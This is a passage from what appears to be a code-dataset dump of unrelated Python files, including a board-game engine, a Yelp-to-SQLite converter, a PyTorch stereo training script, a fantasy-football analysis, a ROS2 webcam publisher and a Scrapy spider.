self.build_from_file_is_legal(i):\n\t\t\t\tlegal_moves += [Move(MOVE_TYPES.index('build_from_file'), 
index=i)]\n\t\treturn legal_moves\n\n\t# get the card built by the move\n\tdef get_move_build(self, move):\n\t\tcard = None\n\t\tif move.move_type == MOVE_TYPES.index('build_from_file'):\n\t\t\tcard = self.archive[move.index]\n\t\tif move.move_type == MOVE_TYPES.index('build_from_shown'):\n\t\t\tcard = self.tier_showns[move.tier][move.index]\n\t\tif card is None:\n\t\t\treturn None\n\t\treturn self.card_data.cards[card]\n\n\tdef run_move(self, move, check_illegal=True):\n\t\tif move.move_type == MOVE_TYPES.index('new_turn'):\n\t\t\tself.new_turn()\n\t\telif move.move_type == MOVE_TYPES.index('draw_marble'):\n\t\t\tself.draw_marble()\n\t\telif move.move_type == MOVE_TYPES.index('pick'):\n\t\t\tself.pick(move.col)\n\t\telif move.move_type == MOVE_TYPES.index('file_shown'):\n\t\t\tself.file_shown(move.tier, move.index)\n\t\telif move.move_type == MOVE_TYPES.index('build_from_file'):\n\t\t\tself.build_from_file(move.index)\n\t\telif move.move_type == MOVE_TYPES.index('build_from_shown'):\n\t\t\tself.build_from_shown(move.tier, move.index)\n\n\t\tif check_illegal and self.illegal_move:\n\t\t\traise Exception('tried to run an illegal move')\n\n\tdef calc_score(self):\n\t\treturn self.vp + self.card_vp\n\nMOVE_TYPES = [\n\t'new_turn',\n\t'draw_marble',\n\t'pick',\n\t'file_shown',\n\t'build_from_file',\n\t'build_from_shown'\n]\nclass Move:\n\tdef __init__(self, move_type, col=None, tier=None, index=None):\n\t\tself.move_type = move_type\n\t\tself.col = col\n\t\tself.tier = tier\n\t\tself.index = index\n","sub_path":"gizmos.py","file_name":"gizmos.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"461247355","text":"import itchat\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\nfrom wordcloud import WordCloud\nimport api\nimport jieba\n\nmy_font = '/Library/Fonts/songti.ttc'\nitchat.auto_login()\n\ndef friends_set(name_set, signature_set):\n\n friend_list = itchat.get_friends(update=True)[0:]\n for friend in friend_list:\n name_set.append(friend['NickName'])\n if friend['Signature']:\n signature_set.append(friend['Signature'])\n\ndef show_cloud(set):\n\n text = ''.join(set)\n wordlist = jieba.cut(text, cut_all=True)\n word_space_split = \" \".join(wordlist)\n\n pb_mask = np.array(Image.open(\"pic.jpg\"))\n wc = WordCloud(font_path=my_font,\n background_color=\"white\", max_font_size=100,\n min_font_size=38,max_words=5000, mask=pb_mask,scale=1)\n wc.generate(word_space_split)\n plt.figure(figsize=(55, 55))\n plt.imshow(wc, interpolation=\"bilinear\")\n plt.axis(\"off\")\n plt.show()","sub_path":"day58-60/day2-3/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"402202950","text":"import json\nimport sqlite3\nimport time\n\n\"\"\"\nAuthor: Shih-Ting Huang (sh3964)\n\nConvert business.json to Business table in yelp.db\n\"\"\"\n\n\nclass Hours:\n __slots__ = 'jsonDict', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'\n\n def __init__(self, json_dict):\n self.jsonDict = json_dict['hours']\n self.Monday = self.jsonDict['Monday'] if 'Monday' in self.jsonDict else None\n self.Tuesday = self.jsonDict['Tuesday'] if 'Tuesday' in self.jsonDict else None\n self.Wednesday = self.jsonDict['Wednesday'] if 'Wednesday' in self.jsonDict else None\n self.Thursday = self.jsonDict['Thursday'] if 'Thursday' in self.jsonDict else None\n 
self.Friday = self.jsonDict['Friday'] if 'Friday' in self.jsonDict else None\n self.Saturday = self.jsonDict['Saturday'] if 'Saturday' in self.jsonDict else None\n self.Sunday = self.jsonDict['Sunday'] if 'Sunday' in self.jsonDict else None\n\n\nclass BizType:\n __slot__ = 'jsonDict', 'biz_type'\n\n def __init__(self, json_dict):\n self.jsonDict = json_dict['categories']\n related_type = ['Restaurants', 'Food', 'Diners']\n self.biz_type = 0\n for x in related_type:\n # found! break the search\n if x in self.jsonDict:\n self.biz_type = 1\n break\n # if 'Restaurants' in self.jsonDict or 'Food' in self.jsonDict or 'Diners' in self.jsonDict:\n # self.biz_type = 1\n # else:\n # self.biz_type = 0\n\n\nclass Attributes:\n __slots__ = 'jsonDict', 'goodForGroup', 'goodForKids', 'wheelchair', 'noiseLevel', 'alcohol', \\\n 'takeOut', 'reservation', 'delivery', 'hasTV', 'wifi', 'priceLevel', 'creditCard'\n\n def __init__(self, json_dict):\n self.jsonDict = json_dict\n # print(self.jsonDict)\n attributes = ['RestaurantsGoodForGroups', 'GoodForKids', 'NoiseLevel', 'Alcohol', 'RestaurantsTakeOut',\n 'RestaurantsReservations', 'BusinessAcceptsCreditCards', 'RestaurantsDelivery', 'HasTV',\n 'RestaurantsPriceRange2', 'WiFi', 'WheelchairAccessible']\n default = None\n try:\n self.goodForGroup = self.jsonDict['RestaurantsGoodForGroups']\n except KeyError:\n self.goodForGroup = default\n\n try:\n self.goodForKids = self.jsonDict['GoodForKids']\n except KeyError:\n self.goodForKids = default\n\n try:\n self.wheelchair = self.jsonDict['WheelchairAccessible']\n except KeyError:\n self.wheelchair = default\n\n try:\n self.noiseLevel = self.jsonDict['NoiseLevel']\n except KeyError:\n self.noiseLevel = default\n\n try:\n self.alcohol = self.jsonDict['Alcohol']\n except KeyError:\n self.alcohol = default\n\n try:\n self.takeOut = self.jsonDict['RestaurantsTakeOut']\n except KeyError:\n self.takeOut = default\n\n try:\n self.reservation = self.jsonDict['RestaurantsReservations']\n except KeyError:\n self.reservation = default\n\n try:\n self.delivery = self.jsonDict['RestaurantsDelivery']\n except KeyError:\n self.delivery = default\n\n try:\n self.hasTV = self.jsonDict['HasTV']\n except KeyError:\n self.hasTV = default\n\n try:\n self.wifi = self.jsonDict['WiFi']\n except KeyError:\n self.wifi = default\n\n try:\n self.priceLevel = self.jsonDict['RestaurantsPriceRange2']\n except KeyError:\n self.priceLevel = default\n\n try:\n self.creditCard = self.jsonDict['BusinessAcceptsCreditCards']\n except KeyError:\n self.creditCard = default\n\n\nclass Business:\n __slots__ = 'jsonDict', 'name', 'business_id', 'postal_code', 'is_open', 'hours', 'stars', 'state', 'city', \\\n 'categories', 'neighborhood', 'longitude', 'attributes', 'review_count', 'address', 'latitude'\n\n def __init__(self, json_dict):\n self.jsonDict = json_dict\n self.categories = BizType(json_dict)\n if self.categories.biz_type == 1:\n self.name = json_dict['name']\n self.business_id = json_dict['business_id']\n # p_code = str(json_dict['postal_code']).split(' ')\n # if len(p_code) > 1:\n # self.postal_code = p_code[0] + '_' + p_code[1]\n # else:\n #\n self.postal_code = json_dict['postal_code']\n self.is_open = json_dict['is_open']\n self.stars = json_dict['stars']\n self.state = json_dict['state']\n self.city = json_dict['city']\n self.neighborhood = json_dict['neighborhood']\n self.longitude = json_dict['longitude']\n # self.attributes = str(json_dict['attributes'])\n self.attributes = Attributes(json_dict['attributes'])\n self.review_count = 
json_dict['review_count']\n self.address = json_dict['address']\n self.latitude = json_dict['latitude']\n self.hours = Hours(json_dict)\n\n def save_to_database(self):\n con = sqlite3.connect(\"business.db\")\n with con:\n cur = con.cursor()\n con.row_factory = sqlite3.Row\n cur.execute(\n \"INSERT INTO Business(\"\n\n \"name,\"\n \"business_id,\"\n \"neighborhood,\"\n \"address,\"\n \"city,\"\n\n \"state,\"\n \"postal_code,\"\n \"latitude,\"\n \"longitude,\"\n \"stars,\"\n\n \"review_count,\"\n \"is_open,\"\n # \"attributes,\"\n \"categories,\"\n # \"hours,\"\n\n \"goodForGroup,\"\n \"goodForKids,\"\n \"wheelchair,\"\n \"noiseLevel,\"\n \"alcohol,\"\n\n \"takeOut,\"\n \"reservation,\"\n \"delivery,\"\n \"hasTV,\"\n \"wifi,\"\n\n \"priceLevel,\"\n \"creditCard,\"\n\n \"monday,\"\n \"tuesday,\"\n \"wednesday,\"\n \"thursday,\"\n \"friday,\"\n \"saturday,\"\n \"sunday\"\n\n \") VALUES (\"\n \"?,?,?,?,?,\"\n \"?,?,?,?,?,\"\n \"?,?,?,\"\n \"?,?,?,?,?,\"\n \"?,?,?,?,?,\"\n \"?,?,\"\n \"?,?,?,?,?,?,?)\",\n\n (\n self.name,\n self.business_id,\n self.neighborhood,\n self.address,\n self.city,\n self.state,\n self.postal_code,\n self.latitude,\n self.longitude,\n self.stars,\n self.review_count,\n self.is_open,\n # self.attributes,\n self.categories.biz_type,\n\n # attributes\n self.attributes.goodForGroup,\n self.attributes.goodForKids,\n self.attributes.wheelchair,\n self.attributes.noiseLevel,\n self.attributes.alcohol,\n self.attributes.takeOut,\n self.attributes.reservation,\n self.attributes.delivery,\n self.attributes.hasTV,\n self.attributes.wifi,\n self.attributes.priceLevel,\n self.attributes.creditCard,\n\n # self.hours,\n self.hours.Monday,\n self.hours.Tuesday,\n self.hours.Wednesday,\n self.hours.Thursday,\n self.hours.Friday,\n self.hours.Saturday,\n self.hours.Sunday\n )\n\n )\n\n\ndef main():\n data = []\n with open('business.json') as f:\n for line in f:\n data.append(json.loads(line))\n start = time.time()\n for case in data:\n this_case = Business(case)\n if this_case.categories.biz_type == 1:\n this_case.save_to_database()\n end = time.time()\n print('Time:', end - start)\n\nif __name__ == '__main__':\n main()\n","sub_path":"convert_business.py","file_name":"convert_business.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"121691249","text":"# -*- coding: utf-8 -*-\n# @Author: lidong\n# @Date: 2018-03-18 13:41:34\n# @Last Modified by: yulidong\n# @Last Modified time: 2018-10-22 16:27:40\nimport sys\nimport torch\nimport visdom\nimport argparse\nimport numpy as np\nimport time\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\n\nfrom torch.autograd import Variable\nfrom torch.utils import data\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nfrom cmf.models import get_model\nfrom cmf.loader import get_loader, get_data_path\nfrom cmf.loss import *\nimport os\n\ndef train(args):\n torch.backends.cudnn.benchmark=True\n # Setup Augmentations\n loss_rec=[0]\n best_error=2\n # Setup Dataloader\n data_loader = get_loader(args.dataset)\n data_path = get_data_path(args.dataset)\n t_loader = data_loader(data_path, is_transform=True,\n split='train', img_size=(args.img_rows, args.img_cols))\n v_loader = data_loader(data_path, is_transform=True,\n split='test', img_size=(args.img_rows, args.img_cols))\n\n trainloader = data.DataLoader(\n t_loader, batch_size=args.batch_size, num_workers=4, shuffle=True)\n valloader = data.DataLoader(\n 
v_loader, batch_size=args.batch_size, num_workers=4)\n\n\n # Setup visdom for visualization\n if args.visdom:\n vis = visdom.Visdom(env='sceneflow')\n # old_window = vis.line(X=torch.zeros((1,)).cpu(),\n # Y=torch.zeros((1)).cpu(),\n # opts=dict(xlabel='minibatches',\n # ylabel='Loss',\n # title='Trained Loss',\n # legend=['Loss']))\n loss_window = vis.line(X=torch.zeros((1,)).cpu(),\n Y=torch.zeros((1)).cpu(),\n opts=dict(xlabel='minibatches',\n ylabel='Loss',\n title='Training Loss',\n legend=['Loss']))\n pre_window = vis.image(\n np.random.rand(256, 512),\n opts=dict(title='predict!', caption='predict.'),\n )\n ground_window = vis.image(\n np.random.rand(256, 512),\n opts=dict(title='ground!', caption='ground.'),\n )\n image_window = vis.image(\n np.random.rand(256, 512),\n opts=dict(title='image!', caption='image.'),\n )\n # Setup Model\n model = get_model(args.arch)\n # parameters=model.named_parameters()\n # for name,param in parameters:\n # print(name)\n # print(param.grad)\n # exit()\n\n model = torch.nn.DataParallel(\n model, device_ids=range(torch.cuda.device_count()))\n #model = torch.nn.DataParallel(model, device_ids=[0])\n model.cuda()\n\n # Check if model has custom optimizer / loss\n # modify to adam, modify the learning rate\n optimizer = torch.optim.Adam(\n model.parameters(), lr=args.l_rate,betas=(0.9,0.999))\n # optimizer = torch.optim.SGD(\n # model.parameters(), lr=args.l_rate,momentum=0.90, weight_decay=5e-5)\n # optimizer = torch.optim.Adam(\n # model.parameters(), lr=args.l_rate,weight_decay=5e-4,betas=(0.9,0.999),amsgrad=True)\n loss_fn = l1\n trained=0\n scale=100\n\n if args.resume is not None:\n if os.path.isfile(args.resume):\n print(\"Loading model and optimizer from checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n #model_dict=model.state_dict() \n #opt=torch.load('/home/lidong/Documents/cmf/cmf/exp1/l2/sgd/log/83/rsnet_nyu_best_model.pkl')\n model.load_state_dict(checkpoint['model_state'])\n optimizer.load_state_dict(checkpoint['optimizer_state'])\n #opt=None\n print(\"Loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n trained=checkpoint['epoch']\n #trained=0\n \n else:\n print(\"No checkpoint found at '{}'\".format(args.resume))\n print('Initialize from resnet34!')\n resnet34=torch.load('/home/lidong/Documents/CMF/20_bilinear_cmf_flying3d_best_model.pkl')\n #optimizer.load_state_dict(resnet34['optimizer_state'])\n #model\n #model.load_state_dict(resnet34['state_dict'])\n model_dict=model.state_dict() \n pre_dict={k: v for k, v in resnet34['model_state'].items() if k in model_dict}\n # print(pre_dict)\n # exit()\n # for k,v in resnet34['state_dict'].items():\n # #print('.'.join(k.split('.')[1:]))\n # print(k)\n # for k,v in model_dict.items():\n # print(k)\n model_dict.update(pre_dict)\n model.load_state_dict(model_dict)\n #optimizer\n # opti_dict=optimizer.state_dict()\n # pre_dict={k: v for k, v in resnet34['optimizer_state'].items() if k in opti_dict}\n # # for k,v in pre_dict.items():\n # # print(k)\n # # if k=='state':\n # # for a,b in v.items():\n # # print(a)\n # # for c,d in b.items():\n # # print(c,d) \n # exit()\n # #pre_dict=resnet34['optimizer_state']\n # opti_dict.update(pre_dict)\n # optimizer.load_state_dict(opti_dict)\n print('load success!')\n trained=0\n\n\n\n #best_error=5\n # it should be range(checkpoint[''epoch],args.n_epoch)\n for epoch in range(trained, args.n_epoch):\n #for epoch in range(0, args.n_epoch):\n \n #trained\n print('training!')\n model.train()\n for i, (left, 
right,disparity,image) in enumerate(trainloader):\n #with torch.no_grad():\n #print(left.shape)\n #print(torch.max(image),torch.min(image))\n start_time=time.time()\n left = left.cuda()\n right = right.cuda()\n disparity = disparity.cuda()\n mask = (disparity < 192) & (disparity >= 0)\n mask.detach_()\n optimizer.zero_grad()\n #print(P.shape)\n output1, output2, output3 = model(left,right)\n #print(output3.shape)\n output1 = torch.squeeze(output1, 1)\n output2 = torch.squeeze(output2, 1)\n output3 = torch.squeeze(output3, 1)\n # #outputs=outputs\n loss = 0.5 * F.smooth_l1_loss(output1[mask], disparity[mask],reduction='elementwise_mean') \\\n + 0.7 * F.smooth_l1_loss(output2[mask], disparity[mask], reduction='elementwise_mean') \\\n + F.smooth_l1_loss(output3[mask], disparity[mask], reduction='elementwise_mean')\n #loss=loss/2.2\n #output3 = model(left,right)\n\n #loss = F.smooth_l1_loss(output3[mask], disparity[mask], reduction='elementwise_mean')\n loss.backward()\n #parameters=model.named_parameters()\n optimizer.step()\n \n \n #torch.cuda.empty_cache()\n #print(loss.item)\n if args.visdom ==True:\n vis.line(\n X=torch.ones(1).cpu() * i+torch.ones(1).cpu() *(epoch-trained)*5457,\n Y=loss.item()*torch.ones(1).cpu()/2.2,\n win=loss_window,\n update='append')\n #print(torch.max(output3).item(),torch.min(output3).item())\n if i%15==0:\n #print(output3.shape)\n pre = output3.data.cpu().numpy().astype('float32')\n pre = pre[0,:,:]\n #print(np.max(pre))\n #print(pre.shape)\n pre = np.reshape(pre, [256,512]).astype('float32')\n vis.image(\n pre,\n opts=dict(title='predict!', caption='predict.'),\n win=pre_window,\n )\n\n ground=disparity.data.cpu().numpy().astype('float32')\n ground = ground[0, :, :]\n ground = np.reshape(ground, [256,512]).astype('float32')\n vis.image(\n ground,\n opts=dict(title='ground!', caption='ground.'),\n win=ground_window,\n )\n image=image.data.cpu().numpy().astype('float32')\n image = image[0,...]\n #image=image[0,...]\n #print(image.shape,np.min(image))\n image = np.reshape(image, [3,256,512]).astype('float32')\n vis.image(\n image,\n opts=dict(title='image!', caption='image.'),\n win=image_window,\n ) \n loss_rec.append(loss.item())\n print(time.time()-start_time)\n print(\"data [%d/5457/%d/%d] Loss: %.4f\" % (i, epoch, args.n_epoch,loss.item()/2.2))\n\n state = {'epoch': epoch+1,\n 'model_state': model.state_dict(),\n 'optimizer_state': optimizer.state_dict(),\n }\n np.save('loss.npy',loss_rec)\n torch.save(state, \"{}_{}_{}_best_model.pkl\".format(\n epoch,args.arch, args.dataset)) \n #exit()\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Hyperparams')\n parser.add_argument('--arch', nargs='?', type=str, default='bilinear_cmf_sub_8',\n help='Architecture to use [\\'region support network\\']')\n parser.add_argument('--dataset', nargs='?', type=str, default='flying3d',\n help='Dataset to use [\\'sceneflow and kitti etc\\']')\n parser.add_argument('--img_rows', nargs='?', type=int, default=480,\n help='Height of the input image')\n parser.add_argument('--img_cols', nargs='?', type=int, default=640,\n help='Width of the input image')\n parser.add_argument('--n_epoch', nargs='?', type=int, default=4000,\n help='# of the epochs')\n parser.add_argument('--batch_size', nargs='?', type=int, default=4,\n help='Batch Size')\n parser.add_argument('--l_rate', nargs='?', type=float, default=1e-3,\n help='Learning Rate')\n parser.add_argument('--feature_scale', nargs='?', type=int, default=1,\n help='Divider for # of features to use')\n 
parser.add_argument('--resume', nargs='?', type=str, default=None,\n help='Path to previous saved model to restart from /home/lidong/Documents/PSSM/rstereo_sceneflow_best_model.pkl')\n parser.add_argument('--visdom', nargs='?', type=bool, default=True,\n help='Show visualization(s) on visdom | False by default')\n args = parser.parse_args()\n train(args)\n","sub_path":"back of code/CMF/train-20181113162613.py","file_name":"train-20181113162613.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"176862608","text":"import cudf as dd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndf = dd.read_csv(\"players_raw.csv\")\ndf = df[['first_name', 'second_name', 'id', 'total_points', 'team_code', 'now_cost', 'minutes', 'element_type', 'status']]\ndf2 = dd.read_csv(\"teams.csv\")\ndf2 = df2[['code', 'name']]\ndf2['team_code'] = df2['code']\ndel df2['code']\ndf3 = dd.merge(df,df2, on='team_code')\nteams = df3['name'].unique()\ntotal_team_points = []\ntotal_team_values = []\nfor t in teams:\n total_team_point = df3[df3['name'] == t]['total_points'].sum()\n total_team_points.append(total_team_point)\n total_team_value = df3[df3['name'] == t]['now_cost'].sum()\n total_team_values.append(total_team_value)\n\ndf4 = dd.DataFrame()\ndf4['team_name'] = teams\ndf4['total_fantasy_points'] = total_team_points\ndf4['total_team_value'] = total_team_values\n\ntotal_players_frequenty_play = []\nteam_roi = []\nfor t in teams:\n total_team_point = df4[df4['team_name'] == t]['total_fantasy_points'][0]\n total_team_value = df4[df4['team_name'] == t]['total_team_value'][0]\n roi = total_team_point / total_team_value\n team_roi.append(roi)\n total_p_play_lot = df3[(df3['name'] == t) & (df3['minutes'] > 360)]['id'].count()\n total_players_frequenty_play.append(total_p_play_lot)\n\ndf4['roi'] = team_roi\ndf4['total_players'] = total_players_frequenty_play\n\nplayer_roi = []\nplayer_name = []\nplayer_team = []\nplayer_position = []\nplayer_price = []\nfor p in df3['id']:\n player_points = df3[df3['id'] == p]['total_points'][0]\n player_value = df3[df3['id'] == p]['now_cost'][0]\n roi = player_points / player_value\n player_roi.append(roi)\n player_name.append(df3[df3['id'] == p]['first_name'][0] + df3[df3['id'] == p]['second_name'][0])\n player_team.append(df3[df3['id'] == p]['name'][0])\n player_position.append(df3[df3['id'] == p]['element_type'][0])\n player_price.append(player_value)\n\n\ndf5 = dd.DataFrame()\ndf5['player_name'] = player_name\ndf5['player_roi'] = player_roi\ndf5['player_team'] = player_team\ndf5['player_pos'] = player_position\ndf5['player_value'] = player_price\n\ndf5 = df5.sort_values('player_roi', ascending=False)\n\ndf5.head(50).to_csv(\"top_50.csv\")\ndf5.tail(50).to_csv(\"worst_50.csv\")\n\nn_groups = len(teams)\n\n# create plot\nfig, ax = plt.subplots(figsize=(16,8))\nindex = np.arange(n_groups)\nbar_width = 0.35\nopacity = 0.8\n\nrects1 = plt.bar(index, df4['total_fantasy_points'], bar_width,\nalpha=opacity,\ncolor='b',\nlabel='Total Fantasy Point')\n\nrects2 = plt.bar(index + bar_width, df4['total_team_value'], bar_width,\nalpha=opacity,\ncolor='g',\nlabel='Total Team Cost')\n\nplt.xlabel('Team')\nplt.ylabel('Value')\nplt.xticks(index + bar_width, teams)\nplt.xticks(rotation=70)\nplt.legend()\n\nplt.show()\n\nn_groups = len(teams)\n\n# create plot\nfig, ax = plt.subplots(figsize=(16,8))\nindex = np.arange(n_groups)\nbar_width = 0.35\nopacity = 0.8\n\nrects1 = plt.bar(index, df4['roi'], 
bar_width,\nalpha=opacity,\ncolor='g',\nlabel='Team ROI')\n\nrects2 = plt.bar(index + bar_width, df4['total_players'], bar_width,\nalpha=opacity,\ncolor='r',\nlabel='Total Players That Play More Than 360 Minutes')\n\nplt.xlabel('Team')\nplt.ylabel('Value')\nplt.xticks(index + bar_width, teams)\nplt.xticks(rotation=70)\nplt.legend()\n\nplt.show()\n\nplt.scatter(df3['now_cost'], df3['total_points'] , c='black', alpha=1)\nplt.title('Player Cost Vs Player Points')\nplt.xlabel('Cost (million)')\nplt.ylabel('Total Points')\nplt.axhline(y=100, color='r', linestyle='-')\nplt.axvline(x=80, color='r', linestyle='-')\nplt.show()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"349922867","text":"from ocdskit.commands.base import OCDSCommand\n\n\nclass Command(OCDSCommand):\n name = 'split-release-packages'\n help = 'reads release packages from standard input, and prints many release packages for each'\n\n def add_arguments(self):\n self.add_argument('size', type=int, help='the number of releases per package')\n\n def handle(self):\n # See exploration of not reading each input into memory: https://github.com/open-contracting/ocdskit/issues/118\n for package in self.items():\n releases = package['releases']\n\n for i in range(0, len(releases), self.args.size):\n package.update(releases=releases[i:i + self.args.size])\n\n self.print(package)\n","sub_path":"ocdskit/commands/split_release_packages.py","file_name":"split_release_packages.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"125973084","text":"from vehicle import *\nfrom customer import *\n\nclass Employee(object):\n emp_id=0\n\n def __init__(self, name):\n self.__name=name\n self.__id=Employee.emp_id\n Employee.emp_id += 1\n\n def __str__(self):\n return '%s is of type %s'%(self.__name,self.get_title())\n ######## CODE MISSING HERE\n\n def get_name(self):\n return self.__name\n\n \n def get_title(self):\n return 'Subordinate'\n ######## CODE MISSING HERE\n \nclass Manager(Employee):\n\n def get_title(self):\n return 'Manager'\n ######## CODE MISSING HERE\n\n def get_sales_report(self,salesman):\n try:\n print('%s current cumulative sales %d'%(salesman.get_name(),salesman.sales[salesman]))\n except KeyError as err:\n print('KeyError: salesman doesnt have any sales jet')\n ######## CODE MISSING HERE\n\nclass Salesman(Employee):\n\n sales={}\n\n def sale(self,vehicle,sales_price,customer):\n if customer.credit_score()==True:\n if self in Salesman.sales:\n Salesman.sales[self] += sales_price\n else:\n Salesman.sales[self]=sales_price\n else:\n print('Customer does not have enough credit score')\n\n\n\n### test cases ###\n\n## initialising employee instances\n\nEric = Manager(\"Eric\")\nKyle = Employee(\"Kyle\")\nStan = Salesman(\"Stan\")\nKenny = Salesman(\"Kenny\")\nCraig = Salesman(\"Craig\")\n\n## printing employee instances\n\nprint(Eric) # expected output: Employee: Eric is of type Manager\nprint(Kyle) # expected output: Employee: Kyle is of type Subordinate\nprint(Stan) # expected output: Employee: Stan is of type Subordinate\nprint(Kenny) # expected output: Employee: Kenny is of type Subordinate\nprint(Craig) # expected output: Employee: Craig is of type Subordinate\n\n\n## registering sales\n\nKenny.sale(Veh2,6000,Heidi)\n\nStan.sale(Veh1,9000,Wendy)\n\n\n## printing an individual sales 
report:\nprint(Kenny)\n#print(Salesman.sales)\n\nEric.get_sales_report(Kenny)\nEric.get_sales_report(Stan)\n# expected output:\n# Kenny's current cumulative sales:\n# 6000\n\n\n","sub_path":"employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"541545031","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nbscuda_exec = [0.45, 0.81, 1.58, 3.16]\nbscuda_xfer = [7.82, 14.44, 27.35, 53.38]\nbspara_gpu_exec = [0.52, 0.96, 1.98, 3.76]\nbspara_xfer = [7.69, 14.16, 26.91, 52.91]\nbspara_interp = [3.95, 4.12, 4.29, 4.79]\nbspara_init = [1.66, 1.80, 1.53, 1.40]\nbspara_ptxcomp = [7.09, 7.17, 6.81, 6.77]\n\nfor i in range(4):\n bspara_interp[i] -= bspara_init[i]\n\nN = 4\nopts = np.arange(N)\nwidth = 0.35\nspace = 0.1\n\ncolor1 = 'blue'\nhatch1 = \"\\\\\"\ncolor2 = 'red'\nhatch2 = '//'\n\nfig = plt.figure()\nax = fig.add_subplot(111)\ncudRects1 = ax.bar(opts, bscuda_xfer, width, color=color1,\n hatch=hatch1)\nparRects1 = ax.bar(opts+width+space, bspara_xfer, width, color=color1,\n hatch=hatch1)\n\ncudRects2 = ax.bar(opts, bscuda_exec, width, color=color2,\n bottom=bscuda_xfer, hatch=hatch2)\nparRects2 = ax.bar(opts+width+space, bspara_gpu_exec, width, color=color2,\n bottom=bspara_xfer, hatch=hatch2)\n\nnpbspara_gpu_exec = np.array(bspara_gpu_exec)\nnpbspara_xfer = np.array(bspara_xfer) + npbspara_gpu_exec\nparRects3 = ax.bar(opts+width+space, bspara_interp, width, color='brown',\n bottom=npbspara_xfer)\n\nnpbspara_interp = np.array(bspara_interp) + npbspara_xfer\nparRects4 = ax.bar(opts+width+space, bspara_init, width, color='yellow',\n bottom=npbspara_interp, hatch='|')\n\nnpbspara_init = np.array(bspara_init) + npbspara_interp\nparRects5 = ax.bar(opts+width+space, bspara_ptxcomp, width, color='green',\n bottom=npbspara_init, hatch='x')\n\n\nax.set_xlabel('Number Of Options')\nax.set_ylabel('Time In Milliseconds')\nax.set_title('GPU Black-Scholes Execution Time')\nax.set_xticks(opts+(0.5*space+width))\nax.set_xticklabels(('1M', '2M', '4M', '8M'))\nax.set_yticks(np.arange(0, 100, 10))\n\nax.legend((cudRects1[0], cudRects2[0],\n parRects3[0], parRects4[0], parRects5[0]),\n ('Data Transfer Time', 'Execution Time', 'Interpreter',\n 'Initialization', 'PTX Compilation'), loc='upper left')\n\ndef autolabel(rects, title):\n for rect in rects:\n height = rect.get_y() + rect.get_height()\n ax.text(rect.get_x()+rect.get_width()/2., 3.0+height, title,\n ha='center', va='bottom')\n\nautolabel(cudRects2, 'CUDA')\nautolabel(parRects5, 'Parakeet')\n\nplt.show()\n\n","sub_path":"papers/ICFP11/bs_nocpu.py","file_name":"bs_nocpu.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"52293872","text":"import rclpy\nfrom rclpy.node import Node\nimport cv2\nimport numpy as np\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\n\nclass Webcam_cap: \n def __init__(self): \n self.cam = cv2.VideoCapture(0) # video capturing from the camera, default cam number is 0\n self.cam.set(3,640)\n self.cam.set(4,480)\n \n def Capture_Frame(self): \n _, self.img = self.cam.read() # Defining our image\n return self.img \n\nclass Campublisher(Node):\n \n def __init__(self):\n super().__init__('Cam_publisher')\n self.publisher = self.create_publisher(Image, 'camera_msg', 1000)\n self.timer = self.create_timer(0.01, self.timer_callback)\n 
self.obj = Webcam_cap()\n self.bridge = CvBridge()\n print(\"webcam running....\")\n\n def timer_callback(self):\n pub_frames = self.obj.Capture_Frame()\n msg = self.bridge.cv2_to_imgmsg(pub_frames) \n self.publisher.publish(msg)\n\ndef main():\n rclpy.init()\n node = Campublisher()\n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n pass \n node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__': \n main()\n\n","sub_path":"src/python_turtle/python_turtle/webcam_pub.py","file_name":"webcam_pub.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"92453934","text":"from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.selector import HtmlXPathSelector\n\nfrom blackwidow.items import HeelsItem\n\n\nclass SayHelloMaxSpider(CrawlSpider):\n\n name = 'sayhellomax'\n allowed_domains = ['sayhellomax.com', ]\n start_urls = ['http://www.sayhellomax.com/', ]\n\n rules = (\n # find next page\n Rule(\n SgmlLinkExtractor(\n allow=(r'search\\?updated-max=', ), # http://www.sayhellomax.com/search?updated-max=2013-10-21T08:00:00-07:00&max-results=10\n restrict_xpaths=('//a[@id=\"Blog1_blog-pager-older-link\"]', ),\n unique=True,\n ),\n follow=True,\n ),\n\n # find detail page then parse it\n Rule(\n SgmlLinkExtractor(\n allow=(r'\\d+/\\d+/[\\w-]+.html', ), # http://www.sayhellomax.com/2013/11/bundled.html\n 